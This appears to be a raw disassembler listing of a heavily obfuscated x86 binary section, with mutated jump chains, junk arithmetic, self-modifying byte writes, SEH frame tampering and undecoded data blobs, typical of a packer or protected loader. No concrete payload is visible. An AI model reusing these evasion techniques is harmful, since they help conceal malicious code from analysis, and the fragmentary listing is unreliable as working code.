		add	esi, 0F26AEB9Fh
		popf
		test	[esp], dh
		jmp	loc_48CEB9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48AA03:				; CODE XREF: sub_48B609+1172j
		jbe	loc_48A4EE
		mov	eax, esi

loc_48AA0B:				; CODE XREF: sub_48B609+1166j
		sub	ebx, 20E7EF6Fh
		test	ebx, 20000000h
		jmp	loc_48CCCF
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------

loc_48AA1C:				; CODE XREF: _3gijy9nr:0048C9D0j
		xchg	edi, [esp]
		pop	edi
		xchg	ebp, [esp]
		push	ebp
		jmp	loc_48C82C
; ---------------------------------------------------------------------------
		db 2 dup(0), 59h
		dd 65241C87h, 0F18B56ECh, 48A21068h, 0FE41E900h, 0FFFFh
		dd 8DC66857h, 815FF60Eh, 260C1E7h, 69C781F0h, 81BD3801h
		dd 4A1F8AEFh, 90C78143h, 0E99658B5h, 2D33h, 8703C600h
		dd 0B985685Bh, 0CDE90048h, 12h,	96E9CF85h, 2Dh,	65850F00h
		dd 1BFFFFE7h, 7DC281D3h, 878D4861h, 41E92414h, 0C300002Ch
; ---------------------------------------------------------------------------

loc_48AA94:				; CODE XREF: _3gijy9nr:0048A734j
		jmp	near ptr dword_48A2F4+22h
; ---------------------------------------------------------------------------
		db 2 dup(0), 68h
		dd 0A32EB279h, 7CE08158h, 81C24EFAh, 64B9D0C8h,	53C0818Dh
		dd 0E970D541h, 103Ah, 24348700h, 685EDE8Bh, 48C9EEh, 10CDE9h
		dd 5E000000h, 496CF681h, 0C681E6A9h, 8B997368h,	2EA6FE81h
		dd 0B4E944E7h, 0FFFFEDh, 1C76D98Bh, 43840F24h, 51000030h
		dd 48D1B7B9h, 0F868E900h, 0FFFFh
; ---------------------------------------------------------------------------

loc_48AAFC:				; DATA XREF: sub_48D2DE-367Co
		push	5C354C5h

loc_48AB01:				; CODE XREF: _3gijy9nr:0048A2DCj
		pop	edx
		add	edx, 0E8D11E7Dh
		sub	edx, 0BCAC4315h
		jmp	loc_48DB85
; ---------------------------------------------------------------------------
		jnz	loc_48DAD7
		jmp	loc_48B556
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

locret_48AB1F:				; CODE XREF: _3gijy9nr:0048C676j
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48AB22	proc near		; CODE XREF: sub_48D1F6:loc_48B07Ep

; FUNCTION CHUNK AT 0048DD5B SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	byte ptr [edx],	0C1h
		pop	edx
		jmp	loc_48DD5B
sub_48AB22	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_48AB2F:				; CODE XREF: _3gijy9nr:00489FD1j
		retn
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CEEE

loc_48AB31:				; CODE XREF: sub_48CEEE:loc_48AFB3j
		jz	loc_48CAFF
		add	[ecx-563F39h], al
		adc	dh, [ebx]
		retn	0B6E9h
; END OF FUNCTION CHUNK	FOR sub_48CEEE
; ---------------------------------------------------------------------------
		dw 1Fh
		db 0
; ---------------------------------------------------------------------------

loc_48AB45:				; CODE XREF: _3gijy9nr:0048D5C9j
		push	offset loc_48D749
		jmp	loc_48A20B
; ---------------------------------------------------------------------------
		align 10h
		dd 87D73300h, 815A2414h, 41F2EC2h, 0EDC2E9C9h, 0FFFFh
; ---------------------------------------------------------------------------

locret_48AB64:				; CODE XREF: _3gijy9nr:loc_48DB20j
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48ADD6

loc_48AB67:				; CODE XREF: sub_48ADD6:loc_48923Dj
		call	sub_489378
		add	bh, al
		inc	ebp
		in	al, dx
		db	65h
		insb
		xor	esi, [edx]
		mov	dword ptr [ebp-10h], 6C6C642Eh
		xor	eax, eax
		push	esi
		push	11857D6Fh
		jmp	loc_48DA5A
; END OF FUNCTION CHUNK	FOR sub_48ADD6
; ---------------------------------------------------------------------------
		dd 0F590000h, 238684h, 0D81C6800h, 0ACE8BF4Fh
		db 0FDh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DF6B

loc_48AB9B:				; CODE XREF: sub_48DF6B-4B57j
		jmp	loc_48CFA1
; END OF FUNCTION CHUNK	FOR sub_48DF6B

; =============== S U B	R O U T	I N E =======================================



sub_48ABA0	proc near		; CODE XREF: sub_48B609:loc_48CFF5p

; FUNCTION CHUNK AT 0048DE15 SIZE 0000001D BYTES

		xchg	esi, [esp+0]
		xchg	edi, [esp+0]
		mov	esi, edi
		pop	edi
		add	ecx, 10100205h
		jmp	loc_48DE15
sub_48ABA0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	5DAEE4D1h
		push	488FB8h
		jmp	loc_48DCEA
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		and	edx, ebx
		jmp	sub_48C9A0
; ---------------------------------------------------------------------------
		align 4
		dd 8702C600h, 6AA4685Ah, 0C15A8913h, 0F28103C2h, 3A663A93h
		dd 0FE9F850Fh, 0F00FFFFh, 0FFFBE985h, 0DDDE9FFh, 0C30000h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48ABF4:				; CODE XREF: sub_48B609+C62j
		jmp	loc_48C198
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48ABFB:				; CODE XREF: _3gijy9nr:0048948Bj
		jmp	loc_48CCB9
; ---------------------------------------------------------------------------
		dd 0F59E881h, 9EE981BCh, 0FFFFE1h, 9FB8D0Fh, 0B890000h
		dd 1C41C781h, 5EE8E7CCh
		db 13h,	2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4896F0

loc_48AC1F:				; CODE XREF: sub_4896F0+48CDj
		jmp	loc_48BA80
; END OF FUNCTION CHUNK	FOR sub_4896F0
; ---------------------------------------------------------------------------
		dd 3094E900h		; CODE XREF: sub_48B609+12D5j
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48AC2A:				; CODE XREF: _3gijy9nr:00488BB2j
		shr	edi, 0Ch

; =============== S U B	R O U T	I N E =======================================



sub_48AC2D	proc near

; FUNCTION CHUNK AT 0048D802 SIZE 0000000D BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ebx
		mov	ebx, offset byte_48DF57
		jmp	loc_48D802
sub_48AC2D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 0BDEE8100h, 8109A355h, 9C815ACEh, 2DEE8152h,	0F7C60139h
		dd 100000C6h, 0E1A2E900h, 0EE81FFFFh, 0DAE0E47Bh, 59240C87h
		dd 5B8703C6h, 0FA2C381h, 1C900C2Eh, 0C015FF24h,	0E90045D0h
		dd 0FFFFFD68h, 6E870F00h, 0E9000021h, 0FFFFF745h
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D704

loc_48AC8B:				; CODE XREF: sub_48D704:loc_48D242j
		push	eax
		call	edx
		test	byte ptr [ebp-23h], 1
		jz	loc_48AC9E
		jmp	loc_48ADC7
; END OF FUNCTION CHUNK	FOR sub_48D704
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48D704

loc_48AC9E:				; CODE XREF: sub_48D704-2A72j
		mov	esp, ebp
		push	ecx
		mov	ecx, offset nullsub_541
		jmp	loc_48BAEC
; END OF FUNCTION CHUNK	FOR sub_48D704
; ---------------------------------------------------------------------------

loc_48ACAB:				; CODE XREF: _3gijy9nr:0048980Aj
		mov	byte ptr [edi],	87h
		pop	edi
		push	52F6572Dh
		pop	esi
		or	esi, 85DA4109h
		add	esi, 284A4BAFh
		popf

loc_48ACC2:				; DATA XREF: _3gijy9nr:00489805o
		fdiv	qword ptr [esp]
		jmp	loc_48CCC5
; ---------------------------------------------------------------------------

loc_48ACCA:				; DATA XREF: _3gijy9nr:0048A65Fo
		mov	byte ptr [esi],	87h
		pop	esi
		pop	ebx
		xchg	edi, [esp]
		mov	ebp, edi
		pop	edi
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C67D

loc_48ACD6:				; CODE XREF: sub_48C67D+16j
		jmp	nullsub_561
; END OF FUNCTION CHUNK	FOR sub_48C67D
; ---------------------------------------------------------------------------
		align 4
		dd 16850F00h, 87FFFFDDh, 3487240Ch, 5ECE8B24h, 24A1C681h
		dd 679E462h, 968E8h
		db 0
; ---------------------------------------------------------------------------

loc_48ACF9:				; CODE XREF: _3gijy9nr:0048D7D0j
		jmp	loc_489001
; ---------------------------------------------------------------------------
		or	ecx, 0A9C3D75Fh
		jmp	sub_48C7C0
; ---------------------------------------------------------------------------
		db 64h,	8Bh, 5
		dd 30h,	48DE4168h, 0F538E900h, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48AD1C:				; CODE XREF: sub_48B609-14D4j
		mov	eax, [eax]
		sub	eax, edx
		jz	loc_48AE82
		call	sub_48A05F
; END OF FUNCTION CHUNK	FOR sub_48B609
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_585. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_48AD2C:				; CODE XREF: _3gijy9nr:0048DD89j
		xchg	eax, [esp]
		pop	eax
		add	eax, 25487C93h
		call	sub_489A21
		mov	byte ptr [ebx],	87h
		pop	ebx
		or	ebx, 0DB70098h
		sub	ebx, 676E86E1h
		add	ebx, 37BF705Eh
		popa
		sbb	al, 24h
		jmp	loc_48B33B
; ---------------------------------------------------------------------------
		db 2 dup(0), 0Fh
		dd 58D88h, 0E0B7E900h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48AE28

loc_48AD67:				; CODE XREF: sub_48AE28+Aj
		mov	ecx, eax
		pop	eax

loc_48AD6A:				; CODE XREF: _3gijy9nr:loc_489794j
		xor	eax, eax
		sub	eax, [eax]

loc_48AD6E:				; CODE XREF: _3gijy9nr:0048A6B1j
		jmp	near ptr dword_48974C+0Ch
; END OF FUNCTION CHUNK	FOR sub_48AE28
; ---------------------------------------------------------------------------

loc_48AD73:				; CODE XREF: _3gijy9nr:0048A5D0j
					; _3gijy9nr:0048B582j
					; DATA XREF: ...
		pop	large dword ptr	fs:0
		push	offset loc_48BEAF
		jmp	loc_48B370
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48AD86:				; CODE XREF: _3gijy9nr:loc_48D2D2j
		into
		or	al, 24h

loc_48AD89:				; DATA XREF: sub_48B609+9Do
		xchg	eax, ebp
		adc	eax, offset dword_45D0C0
		push	ebx
		mov	ebx, esi
		xchg	ebx, [esp]
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48AD95:				; CODE XREF: sub_48B609:loc_48CFC9j
		push	644AE328h
		xchg	ebx, [esp+0Ch+var_C]
		mov	esi, ebx
		pop	ebx
		rol	esi, 8
		xor	esi, 7C7E79B8h
		add	esi, 0EA4EC4E1h
		jmp	loc_48DC9F
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dd 19850F00h, 0E900002Ch, 0FFFFF676h
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48ADC1	proc near		; CODE XREF: _3gijy9nr:loc_48B095p
		xchg	eax, [esp+0]
		xchg	edx, [esp+0]
sub_48ADC1	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_48D704

loc_48ADC7:				; CODE XREF: sub_48D704-2A6Cj
		mov	eax, edx
		pop	edx
		mov	byte ptr [esi],	85h
		pop	esi
		rol	ebx, 11h
		jmp	loc_48CF42
; END OF FUNCTION CHUNK	FOR sub_48D704

; =============== S U B	R O U T	I N E =======================================



sub_48ADD6	proc near		; DATA XREF: sub_48C67D:loc_48C68Eo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0048923D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AB67 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0048DA5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DB3A SIZE 0000000A BYTES

		push	eax
		mov	eax, edi
		xchg	eax, [esp+4+var_4]
		mov	edi, offset nullsub_554
		jmp	loc_48923D
sub_48ADD6	endp


; =============== S U B	R O U T	I N E =======================================



sub_48ADE6	proc near		; DATA XREF: sub_48B609+192Eo

; FUNCTION CHUNK AT 00488864 SIZE 00000005 BYTES

		call	nullsub_562
		push	esi
		push	0EC264A2Bh
		pop	esi
		and	esi, 763C06C7h
		or	esi, 81B8C429h
		xor	esi, 19FD1900h
		add	esi, ebp
		jmp	loc_488864
sub_48ADE6	endp

; ---------------------------------------------------------------------------
		align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_551. PRESS KEYPAD	"+" TO EXPAND]
		align 2
		dw 0E852h
		dd 2D3Dh
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48AE16:				; CODE XREF: sub_48B609-1118j
		jmp	loc_48A4C9
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4

locret_48AE1C:				; CODE XREF: _3gijy9nr:0048A10Dj
		retn
; ---------------------------------------------------------------------------

loc_48AE1D:				; DATA XREF: _3gijy9nr:0048A108o
		push	esi
		mov	esi, offset loc_48BC8D
		jmp	loc_48D8A3

; =============== S U B	R O U T	I N E =======================================



sub_48AE28	proc near		; CODE XREF: _3gijy9nr:004898C3j
					; _3gijy9nr:0048C22Fp

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0048AD67 SIZE 0000000C BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	[ebx], eax
		pop	ebx
		xchg	eax, [esp+0]
		jmp	loc_48AD67
sub_48AE28	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D1F6

loc_48AE39:				; CODE XREF: sub_48D1F6+21j
		adc	edi, 0CD1F19ABh
		xchg	eax, [esp+0]
		pop	eax
		push	ebp
		jmp	loc_48A1BD
; END OF FUNCTION CHUNK	FOR sub_48D1F6
; ---------------------------------------------------------------------------
		align 2
		push	offset loc_48C8A8
		jmp	loc_48CE81
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CFAC

loc_48AE54:				; CODE XREF: sub_48CFAC+17j
		sub	ebx, 0FF32B165h
		rol	ebx, 17h
		and	ebx, 6E170BAh
		xor	ebx, 4204008h
		das
		retn
; END OF FUNCTION CHUNK	FOR sub_48CFAC
; ---------------------------------------------------------------------------
		jmp	loc_48D23B
; ---------------------------------------------------------------------------
		dd 870F0000h, 0FFFFFEB3h, 58240487h, 0FFE647E9h
					; CODE XREF: _3gijy9nr:loc_48B199p
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48AE82:				; CODE XREF: sub_48B609-8E9j
					; _3gijy9nr:0048B54Aj
		call	loc_48D3B2
		add	[ebx], dl
		fucomp	st(1)
		retn	0FFFCh
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_545. PRESS KEYPAD	"+" TO EXPAND]
		align 2
; START	OF FUNCTION CHUNK FOR sub_48B5AE

loc_48AE92:				; CODE XREF: sub_48B5AE+11j
		jmp	loc_488F77
; END OF FUNCTION CHUNK	FOR sub_48B5AE
; ---------------------------------------------------------------------------
		db 0E9h
		dd 0FFFFF7B2h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48AE9D:				; CODE XREF: sub_48B609:loc_48BCA8j
		popf
		add	eax, edx
		pop	edx
		mov	eax, [eax]
		push	488AB1h
		jmp	nullsub_577
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48AEAF:				; CODE XREF: _3gijy9nr:loc_48DF49j
		jz	loc_48CE7C
		add	[ecx+5483A2D8h], al
		dec	ecx
		sub	edx, esi
		and	edi, ebx
		jno	loc_488F4D
		jmp	loc_48CE7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D530

loc_48AECB:				; CODE XREF: sub_48D530-364Bj
		add	eax, 0C46F1193h
		call	loc_48D418

loc_48AED6:				; CODE XREF: sub_48B609:loc_48CAC4j
		mov	byte ptr [edx],	0C3h
		xchg	eax, [esp-8+arg_4]
		mov	edx, eax
		pop	eax
		push	1EA027E8h
		xchg	edi, [esp-8+arg_4]
		mov	ecx, edi
		pop	edi
		jmp	loc_48D106
; END OF FUNCTION CHUNK	FOR sub_48D530
; ---------------------------------------------------------------------------
		db 0C1h
		dd 1C8702EFh, 0C2815B24h, 745493C6h, 9F2ABE56h,	11E90048h
		dd 0FFFFE0h, 243C8700h,	8B243487h, 68535EFEh, 33C0CB83h
		dd 0DEE6E95Bh, 0FFFFh, 85E9D13Bh, 81000024h, 137ABEE0h
		dd 1F55E9FBh, 0
; ---------------------------------------------------------------------------
		add	ecx, ebp
		jmp	loc_48DDDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48AF3B:				; CODE XREF: sub_48B609:loc_48C5D7j
		mov	byte ptr [edx],	87h
		pop	edx
		xor	eax, 1C2566B0h
		add	eax, 0C9EF0D16h
		sub	eax, 94D5C6D3h
		add	eax, 7F585C6Ch
		or	al, 4
		and	al, 0E9h
		lodsd
		and	al, 0
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 0
dword_48AF60	dd 1D71E8h, 0E9000000h,	2772h, 8E0F0000h, 14A3h, 5F243C87h
					; DATA XREF: _3gijy9nr:00488E4Fo
		dd 0E9241C87h, 0FFFFE1B9h, 0E9530000h, 95Ch, 7CF6C181h
		dd 820FBE14h, 0FFFFE929h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48AF94:				; CODE XREF: sub_48B609+C41j
		xor	edx, 181F8852h
		call	loc_4898D7
		add	[ebx+ecx*4+0E0AE91Eh], bl
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 0
		dd 0C30000h, 0FFF40FE9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CEEE

loc_48AFB3:				; CODE XREF: sub_48CEEE-32B9j
		jmp	loc_48AB31
; END OF FUNCTION CHUNK	FOR sub_48CEEE
; ---------------------------------------------------------------------------
		dd 0F0810000h, 9CD93F21h, 147CE8h, 2A6EE800h, 0
					; CODE XREF: _3gijy9nr:loc_48CD02j
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48AFCC:				; CODE XREF: sub_48B609+2E8j
		jge	loc_489945
		sub	ebx, 0BCAE252Bh
		pushf
		jmp	loc_489943
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48AFDF:				; CODE XREF: sub_48B609+341j
		mov	byte ptr [ecx],	8Bh
		pop	ecx
		and	edx, 159916ABh
		add	edx, 0EEC09FCEh
		xchg	edx, [esp+0]
		jmp	loc_48B9E6
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 0E8h
		dd 0FFFFE195h, 0FFED83E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B003:				; CODE XREF: _3gijy9nr:0048B061j
		jmp	loc_48A445
; ---------------------------------------------------------------------------
		dd 0E9CE8B00h, 0FFFFEFD1h, 53DD0300h, 1C87D98Bh, 0A460B924h
		dd 30E90048h, 13h, 13C7C100h, 4136C781h, 0F781077Ch, 57359FA1h
		dd 6AE9C703h, 1Ch, 0C60000C3h, 0E85B8703h, 1AD7h, 0EA36E900h
		dd 0FFFFh, 1C87F103h, 24148724h
; ---------------------------------------------------------------------------
		mov	ebx, edx
		pop	edx

loc_48B05B:				; CODE XREF: _3gijy9nr:004892D2j
		push	eax
		mov	eax, offset loc_48A44E
		jmp	loc_48B003
; ---------------------------------------------------------------------------
		align 4

loc_48B068:				; CODE XREF: _3gijy9nr:0048996Ej
		xor	edi, 28E344FFh
		add	esi, edi
		pop	edi
		cmc
		db	36h
		xchg	esi, [esp]
		push	edi
		jmp	loc_48A070
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D1F6

loc_48B07E:				; CODE XREF: sub_48D1F6-D0Cj
		call	sub_48AB22
; END OF FUNCTION CHUNK	FOR sub_48D1F6
; ---------------------------------------------------------------------------
		db 0
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B5AE

loc_48B085:				; CODE XREF: sub_48B5AE-15ABj
		jmp	locret_48BDE7
; END OF FUNCTION CHUNK	FOR sub_48B5AE
; ---------------------------------------------------------------------------

loc_48B08A:				; CODE XREF: _3gijy9nr:00488BFAj
		jmp	loc_489726
; ---------------------------------------------------------------------------
		jmp	loc_48B199
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48B095:				; CODE XREF: _3gijy9nr:loc_489AA2j
		call	sub_48ADC1
; START	OF FUNCTION CHUNK FOR sub_48A770

loc_48B09A:				; CODE XREF: sub_48A770+18j
		xchg	ebp, [esp+4+var_4]
		mov	esi, ebp
		pop	ebp
		rol	esi, 12h
		jb	near ptr dword_488C00+85h
; END OF FUNCTION CHUNK	FOR sub_48A770
; ---------------------------------------------------------------------------
		db 2 dup(0), 87h
		dd 3ED38118h, 0E9DAC204h, 0FFFFDBC8h, 0F1810000h, 712BA4BDh
		dd 8192C981h, 0F181BC49h, 0EEE468F3h, 0ECAE8h, 52000000h
		dd 1487D68Bh, 1A65E824h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D6DF

loc_48B0DE:				; CODE XREF: sub_48D6DF-3F61j
		jmp	loc_488BB8
; END OF FUNCTION CHUNK	FOR sub_48D6DF
; ---------------------------------------------------------------------------
		align 4
		dd 24048700h		; CODE XREF: sub_48B609+564p
; ---------------------------------------------------------------------------
		pop	eax
		popf

loc_48B0EA:				; DATA XREF: _3gijy9nr:0048B477o
		wait
		or	al, 24h
		jmp	loc_488B12
; ---------------------------------------------------------------------------
		align 4
		jmp	loc_48D6FB
; ---------------------------------------------------------------------------
		call	sub_48C3B4
		jmp	loc_48CD30
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_489B60

loc_48B104:				; CODE XREF: sub_489B60:loc_48DE3Aj
		rol	edx, 1Eh
		add	edx, 5B292E9h
		call	sub_48CA8E
; END OF FUNCTION CHUNK	FOR sub_489B60
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
		jmp	locret_48D975
; ---------------------------------------------------------------------------
		align 2

locret_48B11A:				; CODE XREF: _3gijy9nr:0048A0FCj
		retn
; ---------------------------------------------------------------------------
		align 4
		dd 14D9E900h, 0E9000000h, 0FFFFFEFDh, 0C0810000h, 0FEBDDC52h
		dd 426E8h, 9F4E900h
		db 2 dup(0), 56h
; ---------------------------------------------------------------------------

loc_48B13B:				; DATA XREF: _3gijy9nr:0048DDECo
		or	[eax-6Dh], ch
		cmp	al, 53h
		pop	ebx
		xchg	edx, [esp]
		mov	esi, edx
		jmp	loc_48D5A5
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48B14C:				; CODE XREF: sub_48B609-168Ej
		test	edi, 24272B5Eh
		jmp	loc_48CFC9
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4

loc_48B158:				; CODE XREF: _3gijy9nr:0048B562j
		xchg	eax, [esp]
		pushf
		push	441F8357h
		xchg	ecx, [esp]
		mov	edx, ecx
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48B166:				; CODE XREF: sub_48B609:loc_48BBB2j
		pop	ecx
		and	edx, 0D751EAAAh
		jmp	loc_48DB9F
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48B173:				; CODE XREF: sub_48B609:loc_48BA80j
					; sub_48B609+1622j
		push	0FE39CA6Fh
		pop	eax
		xor	eax, 34B9FE9Fh
		add	eax, 55D1C444h
		rol	eax, 6
		jmp	loc_48BF20
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		adc	ecx, 5CF3CA6Eh
		jmp	sub_48D620
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48B199:				; CODE XREF: _3gijy9nr:0048B08Fj
		call	near ptr dword_48AE70+8
		add	cl, ch
		cmp	ah, dh
; ---------------------------------------------------------------------------
		dw 0FFFFh
		dd 0F8E90000h		; CODE XREF: sub_48B609+80Bj
		db 0F0h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48B1AB:				; CODE XREF: _3gijy9nr:loc_48976Aj
		mov	[edi], eax
		push	offset loc_489490
		jmp	locret_48BE53
; ---------------------------------------------------------------------------
		pop	large dword ptr	fs:0
		add	esp, 4

loc_48B1C1:				; CODE XREF: _3gijy9nr:loc_48D4ACj
		push	0BE55365Ah
		pop	eax
		call	sub_48CEEE
; ---------------------------------------------------------------------------
		dd 820F0000h, 0D96h, 48DA8A68h,	0D5DAE900h, 0FFFFh, 0BA63C981h
		dd 0B76869CDh, 0E90048B1h, 1F54h, 0F7E80000h, 0FFFFE3h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48B1F9:				; CODE XREF: sub_48B609+189j
		jmp	loc_48B444
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 0E900h
		dd 0FFFFD9C0h, 0E90000C3h, 0A76h, 0EC2C100h, 99ADC281h
		dd 0D5031F57h, 5E2FC281h, 0C4E9D80Fh, 26h, 0E9078900h
		dd 0FFFFD6FDh
; ---------------------------------------------------------------------------

loc_48B22C:				; CODE XREF: _3gijy9nr:loc_48DB1Bj
		mov	byte ptr [eax],	0C3h
		xchg	ecx, [esp]
		mov	eax, ecx
		pop	ecx
		jmp	loc_48B24D
; ---------------------------------------------------------------------------
		align 4
		mov	edi, [ecx]
		jmp	loc_48C8E8
; ---------------------------------------------------------------------------
		align 4
		dd 7E95200h, 0FFFFECh
		db 0
; ---------------------------------------------------------------------------

loc_48B24D:				; CODE XREF: _3gijy9nr:0048B235j
		push	ecx
		pop	ebx
		and	al, 1Ch
		and	al, 8Bh
		dec	esp
		and	al, 10h
		jmp	loc_48D194
; ---------------------------------------------------------------------------
		mov	byte ptr [edi],	83h
		push	ebx
		mov	ebx, offset loc_48BED0
		jmp	loc_48B6B9
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E8h
		dd 0FFFFE513h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48B270:				; CODE XREF: sub_48B609+1309j
		xor	esi, 10A84109h
		add	esi, 0A01CDA28h
		add	eax, esi
		pop	esi
		mov	eax, [eax]
		jmp	loc_489CB2
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 8C68h
		dd 5BD2E99Bh, 8103C3C1h, 9EF899C3h, 0B3F38179h,	0C12DC683h
		dd 0C38106C3h, 0B4F2EB61h, 0FFF6D3E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D530

loc_48B2AB:				; CODE XREF: sub_48D530:loc_48D106j
		rol	ecx, 1Eh
		and	ecx, 2BA93B44h
		push	offset loc_48DF26
		jmp	nullsub_565
; END OF FUNCTION CHUNK	FOR sub_48D530
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48B2BE:				; CODE XREF: sub_48B609+1665j
		push	0F3459F75h
		pop	ebx
		add	ebx, 0B54F3776h
		or	ebx, 5A1D2F11h
		jmp	loc_48C6F1
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 2

loc_48B2D6:				; CODE XREF: _3gijy9nr:00489058j
		add	edx, 0A101F2F5h
		xchg	edx, [esp]
		jmp	sub_489593
; ---------------------------------------------------------------------------
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_550. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_48B2E7:				; CODE XREF: _3gijy9nr:00488FFAj
		jmp	loc_48A272
; ---------------------------------------------------------------------------
		dd 68530000h, 47BC931Ch, 8FCB815Bh, 0E9210382h,	29AAh
		dd 650FC081h, 0C8817883h, 256D4FC0h, 48D71768h,	0F972E900h
		dd 0FFFFh, 4CBDC881h, 9F685A6Ch, 0E90048C5h, 0FFFFE4D1h
